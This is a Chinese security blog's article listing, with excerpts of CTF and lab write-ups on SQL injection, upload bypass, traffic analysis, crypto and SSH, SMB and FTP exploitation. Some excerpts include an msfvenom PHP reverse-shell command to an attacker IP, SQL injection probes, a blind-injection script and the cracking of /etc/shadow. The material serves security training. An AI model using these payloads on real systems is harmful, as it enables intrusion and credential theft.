自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

小锤队长的博客

队长,师傅被妖怪抓走了!

  • 博客(47)
  • 收藏
  • 关注

原创 upload总结及一般处理思路步骤

Table of Contentsupload的一般的检测手段及绕过方法总结:一,前端的javascript检测:一般的绕过方法: 1,禁用前端的javascript检测 2,直接F12,修改页面中的js检测代码 3,用burp suite进行中间修改:二,服务端的MIME检测: 1,修改multipart/...

2019-12-22 20:04:51 5739

原创 CTF——流量分析题型整理总结

我见过的流量分析类型的题目总结:一,ping 报文信息 (icmp协议)二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载)三,sql注入攻击四,访问特定的加密解密网站(md5,base64)五,后台扫描+弱密码爆破+菜刀六,usb流量分析七,WiFi无线密码破解八,根据一组流量包了解黑客的具体行为例题:一,ping 报文信息 (icm...

2019-12-19 21:19:30 50239 12

原创 CTF——MISC——音频隐写整理

Table of Contents1,你真的很不错(flag.wav; 音频波形转摩斯密码) 1.2,lookme(flag.wav; 高低波形转换)2,我爱我的祖国(flag.mp4 ; NTFS交换数据流,以音频为主数据流)3,用眼睛去倾听(flag.wav; 音频频谱隐藏)4,音乐永不停止(flag.mp3; MP3音频文件隐写)5,Silente...

2019-11-23 16:16:25 23301 2

原创 FTP服务后门利用

靶场: ubuntu 192.168.142.128攻击机: kali 192.168.11.165信息收集:探测服务信息:nmap -sV 192.168.142.128可以看到靶机开启了 21 ftp服务,版本号为ProFTPD 1.3.3c使用 searchsploit 查看漏洞信息,找到可以利用的溢出代码可以看到有两个可以用的漏洞,第一个是 远...

2019-10-30 17:12:42 1531

原创 metasploit framework

1,制作一个反弹shell,来执行服务的命令,并监听(能在浏览器上直接访问的就制作php的,可以使用命令执行的建议使用 python型的)(制作python型的只需要把php改为python就可以了)msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw-p 指定使用模块 -f...

2019-10-30 17:12:32 699

原创 靶场提权记录

目录1,下载 靶场的 /etc/passwd 文件 和 /etc/shadow 文件 并破解2, 利用 C语言程序溢出漏洞进行提权(前提是 程序中具有 代码执行函数 execve())3,在本地登录 ssh 实现提权4,使用 perl命令提权5,利用 ubuntu 4.4.0内核 溢出 提权1,下载 靶场的 /etc/passwd 文件 和 /etc/shadow...

2019-10-30 17:12:16 763

原创 《随笔 三》

一般的wordpress的404页面路径:http://ip:port/wordpress/wp-content/themes/twentyfourteen/404.php或者:http://ip:port/wp-content/themes/twentyten/404.phpTable of Contents1,windows下gcc使用:2,libnum的部分 用法:...

2019-10-30 17:10:25 4397

原创 bugku——分析(流量分析)题解

目录1,flag被盗2,中国菜刀3,这么多数据包4,手机热点5,抓到一只苍蝇6,日志审计7,weblogic8,信息提取(超详细)9,特殊后门1,flag被盗ctrl + f 打开搜索框,搜flag ,找到 93 个数据包里有 flag.txt字样,右键,追踪 TCP数据流,在其中看到了 flag:flag{This_is_a_f10g}...

2019-10-19 21:33:53 4326

原创 攻防世界 ——crypto

目录新手区部分题解:1,easy_RSA2,Normal_RSA3,幂数加密4,easy_ECC高手进阶区部分题题解5, ENC6,告诉你个秘密7,Easy-one8,说我作弊需要证据9.x_xor_md510,easy_crypto11,cr2-many-time-secrets12,oldDevier13,wtc_rsa_bbq...

2019-10-17 17:07:35 11402

原创 bugku——web 做题记录

Table of Contents2,秋名山车神:3,速度要快4 welcome to the bugkuctf1,login1(sql约束攻击)sql约束攻击:2,过狗一句话3,细心4,求getshell5,INSERT INFO (sql注入 之 X - F -F 头注入)6,这是一个神奇的登陆框7 多数(sql 注入)8,PHP_...

2019-10-14 19:01:17 1602 1

原创 bugku ——杂项

Table of Contents1,啊哒5多种该方法解决6 Linux :7,爆照8,神秘的文件9,论剑10,账号被盗了11 图穷匕见12,猫片(安恒杯)这题是真的……13,旋转跳跃14,多彩15,convert16,好多数值17,PEN_AND_APPLE18,听首音乐19 color20 怀疑人生21 红绿灯...

2019-10-14 19:00:47 2683 1

原创 攻防世界———MISC 高手区题解

目录1,base64stego2,easycap3,Avatar4,What-is-this5,签到题6,Training-Stegano-17,Excaliflag8,Get-the-key.txt9,glance-5010,4-211,misc112,embarrass13,肥宅快乐题14,小小的PDF至此 我在攻防世界中已经 遇到...

2019-10-14 18:58:18 19385

原创 SMB漏洞

目录一,SMB信息泄露充电站:二,MS17-010 (永恒之蓝) 复现一,SMB信息泄露靶场:192.168.11.167攻击机:kali 192.168.11.165信息探测:nmap -sV 192.168.11.167可以看到开放了,22 ssh端口,139,445的smb服务端口,以及3306的mysal服务扫描更详细的信息:nmap -...

2019-10-06 22:10:55 10686

原创 SSH远程登录解析(linux)

目录一,什么是ssh?二,SSH的两种登录方式剖析:1,口令登录:过程:实际操作过程:特别注意:2,秘钥登录:过程:实际操作过程:三,known_host、authorized_keys、config文件1,known_host:2,authorized_keys:3,config:一,什么是ssh?简单说,SSH是一种网络协议,用于计算...

2019-10-05 15:35:34 473

原创 SSH服务的渗透测试

目录一,ssh私钥泄露充电站:二,ssh 服务测试(暴力破解)充电站:一,ssh私钥泄露靶场:192.168.11.1661,信息嗅探对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限)nmap -sV 192.168.11.166 //挖掘开放服务...

2019-10-05 14:14:17 3394

原创 《随笔 二》

1,is_numeric(), ctype_digit() 都是PHP中判断 变量是否是纯数字2,PHP 中变量作用域明析:变量的声明的关键字: global, static, define, constglobal 用法:在函数外面用global 声明的变量在函数内部 不能直接使用,要想使用必须通过全局变量数组 ...

2019-10-01 20:50:44 690

原创 攻防世界——web高手进阶区题解

目录1,cat (Django,cURL漏洞)2,ics-05(XCTF 4th-CyberEarth)(文件包含 + preg_replace函数漏洞)3,ics-06(爆破id)4,lottery(.git文件泄露)5,NewsCenter(sql注入)6,mfv(.git文件泄露 + php审计+ 命令执行)7,Training-WWW-Robots(robo...

2019-10-01 17:43:13 29096 1

原创 CTF——MISC——流量分析

目录一、流量包修复二、协议分析三、数据提取例题:1,题目:Cephalopod(图片提取)2,题目:特殊后门(icmp协议信息传输)3,题目:手机热点(蓝牙传输协议obex,数据提取)4,题目:想蹭网先解开密码(无线密码破解)5,我的的教练也想打CTF概括来讲在比赛中的流量分析有以下三个方向:1、流量包修复2、协议分析3、数据提取一、流量包修复...

2019-09-26 14:43:23 24511 1

原创 CTF ——crypto ——RSA原理及各种题型总结

RSA原理及各种题型总结Table of Contents一,原理:信息传递的过程:rsa加密的过程:二,CTF 中的 常见的十种类型:1,已知 p ,q,e 求 d?2,已知 n(比较小),e 求 d?3,已知 公钥(n, e) 和 密文 c 求 明文 m?4,已知密文文件 flag.enc / cipher.bin /flag.b64和 公钥文件 ...

2019-09-23 20:56:16 67125 8

原创 SDUT-SQL题解

sql01:(GET-无任何过滤)http://49.234.136.46:32711/index01.php首先题目提示要输入id,那就在url中加入?id=1得到:发现给了两个回显位给出提示信息: flag in another table!(假装自己不是出题人,哈哈哈哈哈)然后需要找出id的闭合方式: ?id=1' (报错) ...

2019-09-05 20:15:21 401

原创 Python 中的 sys 库 和 os 库

一,sys--系统相关的参数和函数1.sys.argv: #list传递给Python脚本的命令行参数列表,第一个参数是程序本身的路径,实现了从程序外部向程序内传递参数。import sysprint("命令行参数如下:")for i in sys.argv: print(i)结果如下:D:\st13\test>1.py 西安 北京 2019-0...

2019-08-31 17:42:35 1232

原创 bugku—— 代码审计 做题记录

目录1,extract变量覆盖2,strcmp比较字符串3,urldecode二次编码绕过4,md5()函数5,数组返回NULL绕过6,弱类型整数大小比较绕过7,sha()函数比较绕过8,md5加密相等绕过9,十六进制与数字比较10, 变量覆盖11,ereg正则%00截断12,strpos数组绕过13,数字验证正则绕过1,extract变量覆...

2019-08-27 20:37:22 459

原创 CTF——PHP审计——变量覆盖

一,变量覆盖漏洞参考:https://www.cnblogs.com/xiaozi/p/7768580.html通常将可以用自定义的参数值替换原有变量值的情况称为变量覆盖漏洞。经常导致变量覆盖漏洞场景有:1,$$使用不当,2,extract()函数使用不当,3,parse_str()函数使用不当,4,import_request_variables()使用不当,5,开启...

2019-08-25 11:24:29 4341 1

原创 bugku- web -login3

login3(过滤了 空格、=、union、逗号、and、where等字符的 布尔型盲注)首先 试一下 admin 和 admin 提示 password error!(这里知道用户名 admin是存在的)这里知道了用户名 admin,那用万能密码试一下呗输入密码: admin' or 1 =1 # 提示password error !应该是有 过滤吧用 自己写的 sql...

2019-08-23 11:41:36 314

原创 CTF——MISC——zip伪加密总结

看了好多博文总结一下吧zip 伪加密原理:zip伪加密是在文件头的加密标志位做修改,进而再打开文件时识被别为加密压缩包。把压缩源文件目录区的 全局方式位标记 的 01 00 或 09 00改为 00 00 就可以去除密码把压缩源文件目录区的 全局方式位标记 的 00 00 改为 01 00 或 09 00 就可以添加...

2019-08-20 16:22:42 16321 1

原创 bugku 杂项 2B

2B一,下载下来是一个没有后缀名的文件,放进 winhex中发现是 png头并且发现在文件尾部还发现了 B2.png 和 pk头把文件改为 .png 后 用 foremost 分离 出来一个压缩包 ,解压时发现需要密码:用暴力破解,破解不开,只能把希望寄托于 zip 伪加密 上了不想手工修改 就用 工具修改使用ZipCenOp.jar清除密码...

2019-08-20 14:53:16 1607 1

原创 CTF——Web——文件包含漏洞

转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857文件包含原理:原理文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。php 中引发文件包含漏洞的通常是以下四个函数:1、include() 当...

2019-08-19 17:18:53 18129

原创 CTF——常见密码

CTF题中遇到的密码总结: 序号 名称 密文 原文 备注 1 栅栏密码: fg2ivyo}l{2s3_o@aw__rcl@ flag{w22_is_v3ry_cool} 所谓栅栏密码,就是把要加密的明文分成N个一组,然后把每组的第1个字连起来,形成一段无规律的话。 不过栅栏密码本...

2019-08-18 20:43:53 18967

原创 bugku ——加密 做题记录

目录1,滴答—滴2,聪明的小羊3,ok4这不是摩斯密码5,easy_crypto6,简单加密7,散乱的密文8 凯撒部长的奖励9,一段base6410,.!?11,+[]-(Brainfuck)12,奇怪的密码13托马斯.杰斐逊(杰斐逊转盘加密)14 zip伪加密15 告诉你个秘密(ISCCCTF)16,这不是 md5 (16进制)...

2019-08-18 19:37:28 3495 1

原创 sql-labs page2(21~38) 解题过程记录

目录less-21( 基于错误的复杂的字符型Cookie注入)less -22(基于错误的双引号字符型Cookie注入)less-23(基于错误的,过滤注释的GET型)less-24(二次注入)less-25(过滤了or和and)less-25a(过滤了or和and的盲注)less-26(过滤了注释和空格的注入)less-26(过滤了空格和注释的盲注)less...

2019-08-14 17:56:32 749 1

原创 CTF——Web——php 弱类型总结

php 弱类型总结特别注意: md5(), json_encode(), array_search(), strcmp(), switch() ,in_array()这几个容易涉及到php弱类型的函数描述:php中有两种比较的符号 == 与 === === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较值是否相等 ...

2019-08-09 16:34:11 3908 1

原创 CTF——Web——PHP序列化和反序列化

PHP 序列化和反序列化:1,序列化(串行化):是将变量转换为可保存或传输的字符串的过程;反序列化(反串行化):就是在适当的时候把这个字符串再转化成原来的变量使用。这两个过程结合起来,可以轻松地存储和传输数据,使程序更具维护性。常见的php系列化和反系列化方式主要有:serialize,unserialize;json_encode,json_decode在进行类的序列化...

2019-08-09 16:33:40 5781 1

原创 CTF——Web——MD5漏洞

md5($ss,ture/false)漏洞:ture :为16位,false:为32位第一种$_GET['a'] != $_GET['b']&&MD5($_GET['a']) == MD5($_GET['b'])要让上面的等式成立,a和b的值不能相等,但是md5后的值相等。(php弱类型)因为是 == 比较,只判断值是否相等,不判断类型是否相同。如果类型...

2019-08-09 16:33:08 2340

原创 sql 注入 相关函数

1,mid()---从文本字段中提取字符2,limit()---返回前几条或者中间某几行数据 ,其m指记录始index0始表示第条记录 n指第m+1条始取n条3,MySQL的concat函数在连接字符串的时候,只要其中一个是NULL,那么将返回NULL4,和concat不同的是, concat_ws函数在执行的时候,不会因为NULL值而返回NULL5,group_concat([D...

2019-08-09 16:31:57 343

原创 sql注入(晨版)

sql 注入:1.sql注入最重要的过程,单引号判断注入最常见。分为三大类:get、post、cookie简单判断get型:http://host/test.php?id=100’ 返回错误说明有可能注入http://host/test.php?id=100 and 1=1 返回正常http://host/test.php?id=100 and 1=2返回错误如果出现以上三种错...

2019-08-09 16:30:44 152

原创 sql 注入

sql 注入:原文网址 https://www.jianshu.com/p/078df7a35671Sql 注入带来的威胁主要有如下几点:猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。绕过认证,列如绕过验证登录网站后台。注入可以借助数据库的存储过程进行提权等操作** 判断是否存在 Sql 注入漏洞**最为经典的单引号判断法:在参数后面加上单引号,比如:http://xx...

2019-08-09 16:30:14 317

原创 《随笔 一》

千峰教程:https://pan.baidu.com/s/1LGX4O5hDGkbLlg2GYHk4gQ 提取码pw99包括:jave基础-进阶-高级-工具, HTML5 基础-进阶-高级-工具, web前端 基础-进阶-高级-工具 , python 基础-进阶-高级 -工具 大...

2019-08-09 16:29:16 4362

原创 sql-labs page1 (1~20)解题过程记录

目录Less1:(基于错误的GET单引号字符型注入)less 2:(GET型整型注入)less 3:(基于错误的GET单引号变形字符型注入)less 4:(基于错误的GET双引号字符型注入)less 5:(双注入GET单引号字符型注入)less 6:(双注入GET双引号字符型注入)less 7:(导出文件GET字符型注入)less 8:(布尔型单引号GET盲注...

2019-08-09 16:26:56 1467

原创 SQL 盲注GET /POST、布尔型,延时型Python脚本

以下脚本都用 sql-labs 中的题目进行测试:sql-labs 靶场:http://43.247.91.228:84/一,sql注入之 GET传参 之 布尔型:import requestsresult = ""url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1...

2019-08-09 16:23:43 4354

转载 sqlmap 相关参数

sqlmap参数选项:-h, -help显示基本帮助信息并退出-hh 显示高级帮助消息并退出--version 显示程序的版本号并退出-v VERBOSE详细级别:0-6(默认1) -u URL, ...

2019-08-03 16:48:26 564

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除